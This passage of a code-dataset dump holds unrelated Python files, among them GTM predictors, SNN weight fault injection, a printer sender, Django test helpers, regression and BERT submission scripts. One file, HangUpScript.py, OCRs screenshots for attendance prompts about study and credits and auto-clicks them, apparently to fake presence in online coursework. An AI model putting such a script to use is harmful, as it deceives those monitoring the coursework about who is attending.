
math\nfrom sklearn import neighbors\nfrom sklearn.decomposition import PCA\nfrom sklearn.neighbors import NearestNeighbors\nfrom .ugtm_gtm import initialize\nfrom .ugtm_gtm import optimize\nfrom .ugtm_gtm import projection\nfrom . import ugtm_landscape\nfrom . import ugtm_preprocess\n\n\ndef predictNN(optimizedModel, labels, new_data, modeltype, n_neighbors=1,\n representation=\"modes\", prior=\"equiprobable\"):\n if modeltype == 'regression':\n activityModel = ugtm_landscape.landscape(optimizedModel, labels)\n elif modeltype == 'classification':\n n_neighbors = 1\n activityModel = ugtm_landscape.classMap(optimizedModel,\n labels, prior).activityModel\n projected = projection(optimizedModel, new_data)\n neighborModel = NearestNeighbors(\n n_neighbors=n_neighbors, metric='euclidean')\n fitted = neighborModel.fit(optimizedModel.matX)\n if representation == 'means':\n rep = projected.matMeans\n elif representation == 'modes':\n rep = projected.matModes\n if modeltype == 'regression' and n_neighbors > 1:\n dist, nnID = fitted.kneighbors(rep, return_distance=True)\n dist[dist <= 0] = np.finfo(float).tiny\n predicted = np.average(\n activityModel[nnID], axis=1, weights=1/((dist)**2))\n else:\n nnID = fitted.kneighbors(rep, return_distance=False)\n predicted = activityModel[nnID]\n return predicted\n\n\ndef predictNNSimple(train, test, labels, n_neighbors=1,\n modeltype='regression'):\n if modeltype == 'regression' and n_neighbors > 1:\n neighborModel = NearestNeighbors(\n n_neighbors=n_neighbors, metric='euclidean')\n fitted = neighborModel.fit(train)\n dist, nnID = fitted.kneighbors(test, return_distance=True)\n dist[dist <= 0] = np.finfo(float).tiny\n predicted = np.average(labels[nnID], axis=1, weights=1/((dist)**2))\n\n else:\n clf = neighbors.KNeighborsClassifier(n_neighbors, weights='distance')\n clf.fit(train, labels)\n predicted = clf.predict(test)\n return predicted\n\n\ndef predictBayes(optimizedModel, labels, new_data, prior=\"equiprobable\"):\n activityModel = ugtm_landscape.classMap(optimizedModel,\n labels, prior).nodeClassP\n projected = projection(optimizedModel, new_data).matR\n predicted = np.argmax(np.dot(projected, activityModel), axis=1)\n return predicted\n\n\ndef advancedGTC(train, labels, test, n_neighbors=1, representation=\"modes\",\n niter=200, k=0, m=0, doPCA=False,\n n_components=-1, missing=False,\n missing_strategy='most_frequent', random_state=1234,\n predict_mode=\"bayes\", prior=\"equiprobable\", l=0.1, s=0.3):\n if k <= 0:\n k = int(math.sqrt(5*math.sqrt(train.shape[0])))+2\n if m <= 0:\n m = int(math.sqrt(k))\n if n_components == -1 and doPCA:\n pca = PCA(random_state=random_state)\n pca.fit(train)\n n_components = np.searchsorted(\n pca.explained_variance_ratio_.cumsum(), 0.8)+1\n print(\"Used n_components explaining 80%% of the variance = %s\\n\"\n % n_components)\n if l < 0.0:\n l = 0.1\n if s <= 0.0:\n s = 0.3\n processed = ugtm_preprocess.processTrainTest(train, test, doPCA,\n n_components, missing,\n missing_strategy)\n initialModel = initialize(processed.train, k, m,\n s, random_state=random_state)\n optimizedModel = optimize(processed.train, initialModel, l, niter, 0)\n prediction = advancedPredictBayes(\n optimizedModel, labels, processed.test, prior)\n return prediction\n\n\ndef advancedPredictBayes(optimizedModel, labels,\n new_data, prior=\"equiprobable\"):\n predicted = {}\n cl = ugtm_landscape.classMap(optimizedModel, labels, prior)\n activityModel = cl.nodeClassP\n projected = projection(optimizedModel, new_data)\n predicted[\"optimizedModel\"] 
= optimizedModel\n predicted[\"indiv_projections\"] = projected\n predicted[\"indiv_probabilities\"] = np.dot(projected.matR, activityModel)\n predicted[\"indiv_predictions\"] = np.argmax(\n predicted[\"indiv_probabilities\"], axis=1)\n predicted[\"group_projections\"] = np.mean(projected.matR, axis=0)\n predicted[\"group_probabilities\"] = np.dot(\n predicted[\"group_projections\"], activityModel)\n predicted[\"uniqClasses\"] = cl.uniqClasses\n return predicted\n\n\ndef printClassPredictions(prediction, output):\n string = \"Classes_in_this_order:\"\n count = 0\n grouproba = prediction[\"group_probabilities\"]\n for i in range(len(prediction[\"uniqClasses\"])):\n string += str(count)+\"=\"+str(prediction[\"uniqClasses\"][i])+\";\"\n count = count + 1\n predvec = [prediction[\"uniqClasses\"][j]\n for j in prediction[\"indiv_predictions\"]]\n np.savetxt(fname=output+\"_indiv_probabilities.csv\",\n X=prediction[\"indiv_probabilities\"],\n delimiter=\",\", header=string, fmt='%.2f')\n np.savetxt(fname=output+\"_indiv_predictions.csv\",\n X=prediction[\"indiv_predictions\"],\n delimiter=\",\", header=string, fmt='%s')\n np.savetxt(fname=output+\"_indiv_predictions_label.csv\",\n X=predvec, delimiter=\",\",\n header=string, fmt='%s')\n np.savetxt(fname=output+\"_group_probabilities.csv\",\n X=grouproba.reshape(1, grouproba.shape[0]),\n delimiter=\",\", header=string, fmt='%.2f')\n print(\"Wrote to disk:\")\n print(\"%s: individual probabilities\" % (output+\"_indiv_probabilities.csv\"))\n print(\"%s: individual predictions\" % (output+\"_indiv_predictions.csv\"))\n print(\"%s: group probabilities\" % (output+\"_group_probabilities.csv\"))\n print(\"\")\n\n\ndef GTC(train, labels, test, k=0, m=0, s=0.3, l=0.1, n_neighbors=1, niter=200,\n representation=\"modes\", doPCA=False, n_components=-1, missing=False,\n missing_strategy='most_frequent', random_state=1234,\n predict_mode=\"bayes\", prior=\"equiprobable\"):\n if k == 0:\n k = int(math.sqrt(5*math.sqrt(train.shape[0])))+2\n if m == 0:\n m = int(math.sqrt(k))\n processed = ugtm_preprocess.processTrainTest(train, test, doPCA,\n n_components, missing,\n missing_strategy)\n initialModel = initialize(processed.train, k, m,\n s, random_state=random_state)\n optimizedModel = optimize(processed.train, initialModel, l, niter, 0)\n if predict_mode == \"knn\":\n prediction = predictNN(optimizedModel, labels, processed.test,\n \"classification\", n_neighbors,\n representation, prior)\n elif predict_mode == \"bayes\":\n prediction = predictBayes(\n optimizedModel, labels, processed.test, prior)\n return prediction\n\n\ndef GTR(train, labels, test, k=0, m=0, s=0.3, l=0.1, n_neighbors=1, niter=200,\n representation=\"modes\", doPCA=False, n_components=-1,\n missing=False, missing_strategy='most_frequent', random_state=1234):\n if k == 0:\n k = int(math.sqrt(5*math.sqrt(train.shape[0])))+2\n if m == 0:\n m = int(math.sqrt(k))\n processed = ugtm_preprocess.processTrainTest(train, test,\n doPCA, n_components)\n initialModel = initialize(processed.train, k, m,\n s, random_state=random_state)\n optimizedModel = optimize(processed.train, initialModel, l, niter, 0)\n prediction = predictNN(optimizedModel=optimizedModel, labels=labels,\n new_data=processed.test, modeltype=\"regression\",\n n_neighbors=n_neighbors,\n representation=representation)\n return 
prediction\n","sub_path":"ugtm/ugtm_predictions.py","file_name":"ugtm_predictions.py","file_ext":"py","file_size_in_byte":8046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"360785004","text":"#---------------------------------------------------\n# Imports\n#---------------------------------------------------\nfrom __future__ import print_function\nimport argparse\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torchvision import datasets, transforms, models\nfrom torch.utils.data.dataloader import DataLoader\nfrom torch.autograd import Variable\nfrom torchviz import make_dot\nfrom matplotlib import pyplot as plt\nfrom matplotlib.gridspec import GridSpec\nimport numpy as np\nimport datetime\nimport pdb\nfrom self_models import *\nimport sys\nimport os\nimport shutil\nimport argparse\n\nerror_type = 'stuck-at-one'\n#error_type = 'stuck-at-zero'\n# error rates: \n\nlist_of_frate = [0.0013, 0.0064, 0.0128, 0.1276, 0.1913, 0.2551, 0.3189, 0.3827]\n\nfrate = list_of_frate[7]\n\ndef insert_faults(state, key, frate):\n # print(state['state_dict']['module.features.0.weight'].data[0, 0, 0])\n print(list(state['state_dict'][key].size()))\n weight_size = list(state['state_dict'][key].size())\n n_indexes = len(weight_size)\n n_elem = torch.numel(state['state_dict'][key])\n n_faults = int(n_elem*frate)\n i = 0\n while (i < n_faults):\n rand_indexes = np.random.randint(0, high=n_elem, size=n_indexes)\n # print(rand_indexes)\n findexes = tuple(np.remainder(rand_indexes, weight_size))\n # if findexes not in (list_findexes):\n i += 1\n # print((findexes))\n # print(state['state_dict'][key].data)\n # input(\"--------\")\n # print(state['state_dict'][key].data[findexes])\n try:\n if error_type == 'stuck-at-zero':\n state['state_dict'][key].data[findexes] = 0.0\n elif error_type == 'stuck-at-one':\n if (state['state_dict'][key].data[findexes] < 0.5 and state['state_dict'][key].data[findexes] >= 0.0): \n state['state_dict'][key].data[findexes] += 0.5\n elif (state['state_dict'][key].data[findexes] < -0.5 and state['state_dict'][key].data[findexes] >= -1.0): \n state['state_dict'][key].data[findexes] += 0.5\n except:\n print(rand_indexes)\n print(findexes)\n # print(state['state_dict'][key].data[findexes])\n # input(\"--------\")\n print(i)\n print(n_elem)\n return 0\n\nmodel = VGG_SNN_STDB(vgg_name = 'VGG16', activation = 'Linear', labels=10, timesteps=200, leak=1.0, default_threshold=1.0, alpha=0.3, beta=0.01, dropout=0.3, kernel_size=3, dataset='CIFAR10')\nmodel = nn.DataParallel(model) \npretrained_snn = './trained_models/snn/snn_vgg16_cifar10.pth'\nstate = torch.load(pretrained_snn, map_location='cpu')\n\n# insert_faults(state, 'module.classifier.3.weight', frate)\n\n# exit()\n \ncur_dict = model.state_dict() \nfor key in state['state_dict'].keys():\n \n if key in cur_dict:\n if (state['state_dict'][key].shape == cur_dict[key].shape):\n insert_faults(state, key, frate)\n\n # cur_dict[key] = nn.Parameter(state['state_dict'][key].data)\n print('\\n Loaded {} from {}'.format(key, pretrained_snn))\n else:\n print('\\n Size mismatch {}, size of loaded model {}, size of current model {}'.format(key, state['state_dict'][key].shape, model.state_dict()[key].shape))\n else:\n print('\\n Loaded weight {} not present in current model'.format(key))\n# model.load_state_dict(cur_dict)\n\n# if 'thresholds' in state.keys():\n# try:\n# if state['leak_mem']:\n# state['leak'] = state['leak_mem']\n# except:\n# 
pass\n# if state['timesteps']!=200 or state['leak']!=1.0:\n# print('\\n Timesteps/Leak mismatch between loaded SNN and current simulation timesteps/leak, current timesteps/leak {}/{}, loaded timesteps/leak {}/{}'.format(timesteps, leak, state['timesteps'], state['leak']))\n# thresholds = state['thresholds']\n# model.module.threshold_update(scaling_factor = 0.7, thresholds=thresholds[:])\n# else:\n# print('\\n Loaded SNN model does not have thresholds')\n\n# print('\\n {}'.format(model))\n\ntry:\n os.mkdir('./trained_models/snn/')\nexcept OSError:\n pass \nfilename = './trained_models/snn/snn_vgg16_cifar10_'+error_type+'_'+str(frate)+'.pth'\ntorch.save(state,filename) \n \n","sub_path":"modify_snn_weight.py","file_name":"modify_snn_weight.py","file_ext":"py","file_size_in_byte":4276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"329844414","text":"# PRINTIGRAM \n# 1 July 2019\n# Tested for Python 3.7.2 on Windows 10 Pro\n# The programme only works on Windows; need to change font to work on other OS.\n\n# Imports. Pil for images, os for paths and file management, printipigeon to sent pictures to printi.\nfrom PIL import Image, ImageDraw, ImageFont\nimport os\nimport printipigeon as pp\n\n# Change directory to where you have stored chromedriver.exe\nos.chdir(\"C:/Users/Merlijn Kersten/Documents/Github/Printigram\")\n\n# The Printigram function\ndef printigram(inputtext): \n lines = [] # Create empty list to store individual lines\n while inputtext != '': # Continue creating lines until the string is empty (i.e. the whole string has been added to lines)\n if len(inputtext) <= maxlength: # If string is not longer than the maximum line length, add it to the lines list.\n lines.append(inputtext)\n break\n else: # If it is, add the longest possible string of words to the lines list (i.e. until the last space before the break)\n linebreak = inputtext.rfind(' ', 0, maxlength)\n lines.append(inputtext[:linebreak])\n inputtext = inputtext[linebreak+1:] # Delete the string of words you added to the lines list from the original string.\n img = Image.new('RGB', (width,len(lines)*50-10), color = 'white') # Create an white image with the width of the printer and the length of the lines\n fnt = ImageFont.truetype('C:/Windows/Fonts/Consola.ttf', size=40) # Use the Consolas font. Only works on Windows.\n for i in range(len(lines)):\n ImageDraw.Draw(img).text((0,i*50), lines[i], font=fnt, fill=(0,0,0)) # Write lines in black text.\n img.save('text.png')\n pp.send_from_path('text.png', printiname) # Use Printi Pigeon to sent pictures to correct printer # Quit driver\n os.remove('text.png') # Remove image\n\n# Script to determine whether one of the words is too long to print. \ndef findlengths(inputtext):\n words = inputtext.split(' ')\n maxinputlength = 0\n for i in range(len(words)):\n if len(words[i]) > maxinputlength:\n maxinputlength = len(words[i])\n return maxinputlength\n\n# User-interactions.\nprint('\\n PRINTIGRAM')\nprint(' Type \"QUIT\" to exit \\n')\n\n# Ask whether to send messages to printi.me or printi.me/mango (different address and different widths)\nprinti = input(' Which printi? Type F (Fons) or M (/mango): ')\nwhile printi not in ['F', 'M', 'f', 'm']: # Make sure that a Printi is chosen\n printi = input('\\n Whoops! Try again. 
Type F (Fons) or M (/mango): ')\nif printi == 'F' or printi == 'f':\n printiname = 'printi'\n width = 576 # Width in pixels\n maxlength = 25 # Maximum number of characters that fit on one line\nelse:\n printiname = 'mango'\n width = 384 # Width in pixels\n maxlength = 16 # Maximum number of characters that fit on one line\n# If new Printi comes online: simply add its details and key above.\n\n# Ask for message input\nmessage = input('\\n Message: ')\nwhile findlengths(message) > maxlength: # Checks whether input words are short enough to print\n print('One of your words is too long. They cannot be longer than ' + str(maxlength) + ' characters.\\n')\n message = input(' Message: ')\nwhile message != 'QUIT': # Regular text: send it to chosen printi\n printigram(message)\n message = input('\\n Message: ')\nif message == 'QUIT': # 'QUIT': Quit programme\n print()\n exit()","sub_path":"Printigram.py","file_name":"Printigram.py","file_ext":"py","file_size_in_byte":4042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"483142618","text":"# coding: utf-8\nimport os\nfrom contextlib import contextmanager\nfrom subprocess import check_output\nfrom django.test.signals import setting_changed\nfrom django.conf import UserSettingsHolder\n\n\n@contextmanager\ndef same_open_fd_count(testcase):\n num_opened_fd_before = get_open_fds_count()\n yield\n num_opened_fd_after = get_open_fds_count()\n testcase.assertEqual(\n num_opened_fd_before, num_opened_fd_after,\n 'Open descriptors count changed, was %s, now %s' % (num_opened_fd_before, num_opened_fd_after)\n )\n\n\ndef get_open_fds_count():\n \"\"\"Return the number of open file descriptors for current process\n\n .. warning: will only work on UNIX-like os-es.\n \"\"\"\n pid = os.getpid()\n procs = check_output([\"lsof\", '-w', '-Ff', \"-p\", str(pid)])\n nprocs = len([s for s in procs.decode('utf-8').split('\\n') if s and s[0] == 'f' and s[1:].isdigit()])\n return nprocs\n\n\nclass override_custom_settings(object):\n \"\"\"\n settings overrider context manager.\n https://github.com/django/django/blob/1.6.2/django/test/utils.py#L209-L268\n \"\"\"\n def __init__(self, settings_obj, **kwargs):\n self.settings = settings_obj\n self.options = kwargs\n\n def __enter__(self):\n self.enable()\n\n def __exit__(self, exc_type, exc_value, traceback):\n self.disable()\n\n def enable(self):\n override = UserSettingsHolder(self.settings._wrapped)\n for key, new_value in self.options.items():\n setattr(override, key, new_value)\n self.wrapped = self.settings._wrapped\n self.settings._wrapped = override\n for key, new_value in self.options.items():\n setting_changed.send(sender=self.settings._wrapped.__class__,\n setting=key, value=new_value)\n\n def disable(self):\n self.settings._wrapped = self.wrapped\n del self.wrapped\n for key in self.options:\n new_value = getattr(self.settings, key, None)\n setting_changed.send(sender=self.settings._wrapped.__class__,\n setting=key, value=new_value)\n","sub_path":"tests/thumbnail_tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"638468739","text":"\"\"\"Add link to Google Colab for each notebook\n\nRipped from https://github.com/jakevdp/PythonDataScienceHandbook/blob/master/tools/add_navigation.py\n\"\"\"\n\nimport os\nimport glob\nimport nbformat\nfrom nbformat.v4.nbbase import new_markdown_cell\n\nROOT_DIR = 
os.path.dirname(os.path.abspath(__file__))\n\ndef iter_notebooks():\n \"\"\"Returns notebook files in all subdirectories\"\"\"\n\n return (filename for filename in glob.iglob(ROOT_DIR + '**/**/*.ipynb', recursive=True))\n\nLINK_COMMENT = \"\\n\"\n\nCOLAB_LINK = \"\"\"\n\"Open\n\"\"\"\n\ndef iter_links():\n \"\"\"Returns paths to notebooks and HTML link to Google Colab for each of them\"\"\"\n\n for nb_path in iter_notebooks():\n link = LINK_COMMENT\n link += COLAB_LINK.format(notebook_filename=os.path.relpath(nb_path))\n yield os.path.join(ROOT_DIR, nb_path), link\n\ndef write_links():\n \"\"\"Add or update a cell in each notebook with a Google Colab link\"\"\"\n\n for nb_name, link in iter_links():\n notebook = nbformat.read(nb_name, as_version=4)\n nb_file = os.path.basename(nb_name)\n is_comment = lambda cell: cell.source.startswith(LINK_COMMENT)\n\n if is_comment(notebook.cells[0]):\n print(\"Amending link for {0}\".format(nb_file))\n notebook.cells[0].source = link\n else:\n print(\"Inserting link for {0}\".format(nb_file))\n notebook.cells.insert(0, new_markdown_cell(source=link))\n\n nbformat.write(notebook, nb_name)\n\nif __name__ == '__main__':\n write_links()\n","sub_path":"postgen_script.py","file_name":"postgen_script.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"315728315","text":"import random\nimport pandas as pd\nimport numpy as np\nfrom numpy.linalg import inv\nfrom numpy import dot\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\n# 最小二乘法求系数\ndef least_square(X, Y):\n X = np.mat(X)\n Y = np.mat(Y)\n beta = dot(dot(inv(dot(X.T, X)), X.T), Y)\n return beta\n\n\n# 回归残差检验\ndef regression_residual_diagnosis(y_original, y_regression):\n y_original = np.mat(y_original)\n y_regression = np.mat(y_regression)\n SSE = np.sum(np.square(y_regression - y_original), axis=0)\n return SSE\n\n\n# 导入excel表格数据\ndata = pd.read_excel('.//data//西瓜数据集.xlsx')\ndata = pd.DataFrame(data).to_numpy()\n\n# 构造数据集X矩阵和Y矩阵。并在X中添加常数项\nx = np.mat(data[:, 1:3])\nconstant = np.ones((x.shape[0], 1))\nX = np.c_[constant, x]\nY = np.mat(data[:, 3]).T\n\n# 从数据集中随机取出10个样本求解系数\n# 记录SSE小于0.3的参数集\ncounts = 10\nbetas = np.zeros((100, 3))\ncount = 0\nwhile 1:\n train_x = np.zeros((counts, 3))\n train_y = np.zeros((counts, 1))\n for i in range(counts):\n index = random.randint(0, X.shape[0] - 1)\n train_x[i] = X[index, 0:3]\n train_y[i] = Y[index, 0]\n # 用最小二乘法算出系数集β\n beta = least_square(train_x, train_y)\n # 计算出回归得到的拟合值\n y_regression = dot(X, beta)\n # 残差检验\n SSE = regression_residual_diagnosis(Y, y_regression)\n if SSE > 0.30:\n continue\n else:\n betas[count] = beta.T\n count += 1\n if count == 100:\n break\n# 对残差检验结果良好的参数集取平均,并进行标准化后用于分析\nbeta_avg = np.mean(betas, axis=0)\nSSE = regression_residual_diagnosis(Y, dot(X, beta_avg).T)\nstandard_beta = np.mean((betas.T - np.mean(betas.T, axis=0)) / np.std(betas.T, axis=0), axis=1)\n# 结果打印\nprint('多元线性回归模型:y=' + str(beta_avg[0]) + '+' + str(beta_avg[1]) + 'x1+' + str(beta_avg[2]) + 'x2')\nprint('参数集β:' + 'β0=' + str(beta_avg[0]) + ' β1=' + str(beta_avg[1]) + ' β2=' + str(beta_avg[2]))\nprint('残差平方和SSE=' + str(SSE))\nprint('标准化参数集β为:' + str(standard_beta))\n\n# 用三维散点图展示原始数据\nx1 = data[:, 1].T\nx2 = data[:, 2].T\ny_original = data[:, 3].T\nfig = plt.figure()\nax = Axes3D(fig)\nax.scatter(x1, x2, y_original, c='g', label='original')\nax.legend(loc='best')\n# 用二元函数图表示二元线性回归模型\nX_r, Y_r = np.meshgrid(np.arange(0, 1, 0.1), np.arange(0, 1, 
0.1))\nZ_r = beta_avg[0] + beta_avg[1] * X_r + beta_avg[2] * Y_r\nax.plot_wireframe(X_r, Y_r, Z_r, rstride=1, cstride=1)\nax.view_init(elev=28, azim=0) # 改变绘制图像的视角,即相机的位置,azim沿着z轴旋转,elev沿着y轴\nax.set_xlabel('x1')\nax.set_ylabel('x2')\nax.set_zlabel('y')\nplt.show()\n","sub_path":"Linear_Regression_Model.py","file_name":"Linear_Regression_Model.py","file_ext":"py","file_size_in_byte":2840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"353223088","text":"#!/usr/bin/env python3\n\nimport tensorflow as tf\nimport pandas as pd\nimport numpy as np\nfrom tensorflow import keras\nimport cleaning\nimport models\nimport train\nimport data\nfrom typing import Any\nfrom typing import List\n\n\nSAMPLE_SUBMISSION=\"../data/sample_submission.csv\"\n\n\ndef predictions_to_dataframe(predictions: np.ndarray) -> pd.DataFrame:\n \"\"\" Convert predictions to pd.DataFrame format \"\"\"\n y = np.round(predictions).astype(int).reshape(-1)\n sample_sub = pd.read_csv(SAMPLE_SUBMISSION)\n sample_ids = sample_sub['id'].values.tolist()\n return pd.DataFrame({\"id\": sample_ids, \"target\": y})\n\n\ndef get_testset() -> pd.DataFrame:\n \"\"\" Return preprocessed testset \"\"\"\n\n test, _ = data.create_sequences(test, data.TWEET_MAX_LEN)\n return test\n\n\ndef submit(model_path: str, dst: str):\n \"\"\" Evaluate model and submit results \"\"\"\n model = keras.models.load_model(model_path)\n testset = get_testset()\n predictions = model.predict(testset)\n df = predictions_to_dataframe(predictions)\n df.to_csv(dst, index=False)\n print(\"Success; model: \" + model_path + \"; dst: \" + dst)\n print(df.head())\n\n\ndef get_bert_testset(sess: tf.Session) -> Any:\n \"\"\" Get preprocessed testset \"\"\"\n _, test = data.load(test=\"test.csv\")\n tokenizer = data.create_bert_tokenizer(sess)\n bert_input = data.get_bert_input(tokenizer, test)\n return bert_input\n\n\ndef submit_bert(model_path: str, dst: str) -> None:\n \"\"\" Evaluate model and submit results \"\"\"\n sess = tf.Session()\n keras.backend.set_session(sess)\n testset = get_bert_testset(sess)\n model = models.make_bert_v2_model(n_fine_tune_layers=2)\n train.initialize_vars(sess)\n model.load_weights(model_path)\n predictions = model.predict(testset)\n df = predictions_to_dataframe(predictions)\n df.to_csv(dst, index=False)\n print(\"Success; model: \" + model_path + \"; dst: \" + dst)\n print(df.head())\n\n \ndef submit_bert_combined(model_paths: List[str], dst: str) -> None:\n \"\"\" Evaluate model and submit results \"\"\"\n sess = tf.Session()\n keras.backend.set_session(sess)\n testset = get_bert_testset(sess)\n model = models.make_bert_v2_model(n_fine_tune_layers=2, pooling=\"mean\")\n train.initialize_vars(sess)\n\n predictions_list = []\n for w_path in model_paths:\n model.load_weights(w_path)\n predictions_list.append(model.predict(testset))\n\n predictions_list = np.array(predictions_list)\n print(predictions_list.shape)\n predictions = np.average(np.array(predictions_list), axis=0)\n print(predictions.shape)\n \n df = predictions_to_dataframe(predictions)\n df.to_csv(dst, index=False)\n print(\"Success; model: \" + str(model_paths) + \"; dst: \" + dst)\n print(df.head())\n\n \nif __name__ == \"__main__\":\n if False:\n submit(\n \"../logs/lstm_64_without_cleaning.h5\",\n \"../logs/lstm_64_without_cleaning.csv\"\n )\n if False:\n submit(\n \"../logs/lstm_64_with_cleaning.h5\",\n \"../logs/lstm_64_with_cleaning.csv\"\n )\n if False:\n submit(\n \"../logs/lstm_64_with_cleaning_dropout_0.1.h5\",\n 
\"../logs/lstm_64_with_cleaning_dropout_0.1.csv\"\n )\n if False:\n submit(\n \"../logs/lstm_128_with_better_embeddings_coverage.h5\",\n \"../logs/lstm_128_with_better_embeddings_coverage.csv\"\n )\n if False:\n submit_bert(\n \"../logs/bert_256_with_cleaned_data.h5\",\n \"../logs/bert_256_with_cleaned_data.csv\"\n )\n if False:\n submit_bert(\n \"../logs/bert_256_2_06_0.87.h5\",\n \"../logs/bert_256_2_06_0.87.csv\"\n )\n if False:\n submit_bert(\n \"../logs/bert_v2_64_0.85.h5\",\n \"../logs/bert_v2_64_0.85.csv\"\n )\n if False:\n submit_bert(\n \"../logs/bert_v2_2layers_050_0.8639.h5\",\n \"../logs/bert_v2_2layers_050_0.8639.csv\"\n )\n if False:\n submit_bert(\n \"../logs/bert_v2_2layers_011_0.8407.h5\",\n \"../logs/bert_v2_2layers_011_0.8407.csv\"\n )\n if False:\n submit_bert_combined(\n [\"../checkpoints/bert_v2_2layers_050_0.8639.h5\",\n \"../checkpoints/bert_v2_2layers_060_0.8546.h5\"],\n \"../logs/bert_v2_2layers_combined.csv\"\n )\n if False:\n submit_bert_combined(\n [\"../checkpoints/bert_v2_2layers_dirty_005_0.8523.h5\",\n \"../checkpoints/bert_v2_2layers_dirty_003_0.8414.h5\",\n \"../checkpoints/bert_v2_2layers_dirty_006_0.8419.h5\",\n \"../checkpoints/bert_v2_2layers_dirty_007_0.8427.h5\",\n \"../checkpoints/bert_v2_2layers_dirty_012_0.8443.h5\",\n \"../checkpoints/bert_v2_2layers_dirty_013_0.8402.h5\",\n \"../checkpoints/bert_v2_2layers_dirty_015_0.8446.h5\",\n \"../checkpoints/bert_v2_2layers_dirty_017_0.8448.h5\",\n \"../checkpoints/bert_v2_2layers_dirty_019_0.8485.h5\"],\n \"../logs/bert_v2_2layers_dirty_combined.csv\"\n )\n if True:\n submit_bert_combined(\n [\"../checkpoints/bert_v2_2layers_mean_007_0.8531.h5\",\n \"../checkpoints/bert_v2_2layers_mean_008_0.8508.h5\",\n \"../checkpoints/bert_v2_2layers_mean_012_0.8504.h5\",\n \"../checkpoints/bert_v2_2layers_mean_009_0.8434.h5\",\n \"../checkpoints/bert_v2_2layers_mean_010_0.8404.h5\",\n \"../checkpoints/bert_v2_2layers_mean_016_0.8466.h5\",\n \"../checkpoints/bert_v2_2layers_mean_017_0.8447.h5\",\n ],\n \"../logs/bert_v2_2layers_mean_combined.csv\"\n )\n","sub_path":"models/submit.py","file_name":"submit.py","file_ext":"py","file_size_in_byte":5622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"568075217","text":"# coding:utf-8\nimport os\nfrom PIL import ImageGrab,Image\nimport pytesseract\nimport threading\nimport pyautogui\nimport random\nimport time\n\npos=[600,465,1222,659]\ntarget0=r'学习'\ntarget1=r'在吗'\ntarget2=r'离开'\ntarget3=r'学分'\ntarget4=r'走开'\n\ndef t1():\n print('Start:')\n\n#定时\ndef t2():\n t1()\n while 1:\n fun()\n time.sleep(10)\n\ndef fun():\n \n print('执行--')\n file_path='C:\\PythonLearn\\Scripts\\AutoLearn\\Image.jpg'\n pic=ImageGrab.grab(pos)\n pic.save(file_path)\n text=pytesseract.image_to_string(Image.open(file_path),lang='chi_sim').encode('utf-8')\n result0=text.rfind(target0)>0\n result1=text.rfind(target1)>0\n result2=text.rfind(target2)>0\n result3=text.rfind(target3)>0\n result4=text.rfind(target4)>0\n print(text)\n end=result0|result1|result2|result3|result4\n if end:\n xrand=random.randint(890,910)\n yrand=random.randint(590,610)\n pyautogui.click(x=xrand,y=yrand,button='left')\n\nif __name__=='__main__':\n t=threading.Thread(target=t2)\n t.start()\n","sub_path":"HangUpScript.py","file_name":"HangUpScript.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"421170414","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Mar 21 
17:32:11 2018\r\n\r\n@author: Vribs\r\n\"\"\"\r\n\r\nimport keras\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Dropout, Flatten,LSTM,Reshape\r\nfrom keras.layers import Conv2D, MaxPooling2D\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nimport csv\r\nimport os\r\nimport cv2\r\nimport numpy as np\r\n\r\nbatch_size = 64\r\nnum_classes = 2\r\nepochs = 3\r\n\r\nlabels = []\r\nlabels1 = []\r\n\r\nwith open(\"3.csv\", 'r') as f:\r\n reader = csv.reader(f)\r\n for row in reader:\r\n if row == []:\r\n labels.append(0)\r\n else:\r\n labels.append(1)\r\n \r\nwith open(\"4.csv\", 'r') as f:\r\n reader = csv.reader(f)\r\n for row in reader:\r\n if row == []:\r\n labels1.append(0)\r\n else:\r\n labels1.append(1)\r\n \r\n\r\nsize = 508\r\n\r\nlabels = labels + labels1\r\n\r\ny_train_np = np.array(labels[:size*2])\r\n\r\ny_test_np = np.array(labels1[:size])\r\n\r\ny_train_np = keras.utils.to_categorical(y_train_np, num_classes)\r\ny_test_np = keras.utils.to_categorical(y_test_np, num_classes)\r\n\r\nx_test_np = np.load('2.npy')\r\nx_train_np = np.load('1.npy')\r\nx_train_np = np.concatenate([x_train_np,x_test_np])\r\nx_train_np = x_train_np.astype('float32')\r\nx_train_np /= 255\r\n\r\n#x_train_np = np.expand_dims(x_train_np, axis = 4)\r\n \r\n \r\n\r\nx_test_np = x_test_np.astype('float32')\r\nx_test_np /= 255\r\n \r\n#x_test_np = np.expand_dims(x_test_np, axis = 4)\r\n\r\n\r\nprint(x_train_np.shape)\r\nprint(x_test_np.shape)\r\nprint(y_train_np.shape)\r\nprint(y_test_np.shape)\r\n\r\ninput_shape = (216, 144,3)\r\n\r\nmodel = Sequential()\r\nmodel.add(Conv2D(32, kernel_size=(3, 3),activation='relu',input_shape=input_shape))\r\nmodel.add(Conv2D(32, (3, 3), activation='relu'))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\nmodel.add(Dropout(0.25))\r\n#model.add(Flatten())\r\nmodel.add(Reshape((530,448)))\r\nmodel.add(LSTM(2))\r\nmodel.add(Dense(128, activation='relu'))\r\nmodel.add(Dropout(0.5))\r\n\r\nmodel.add(Dense(num_classes, 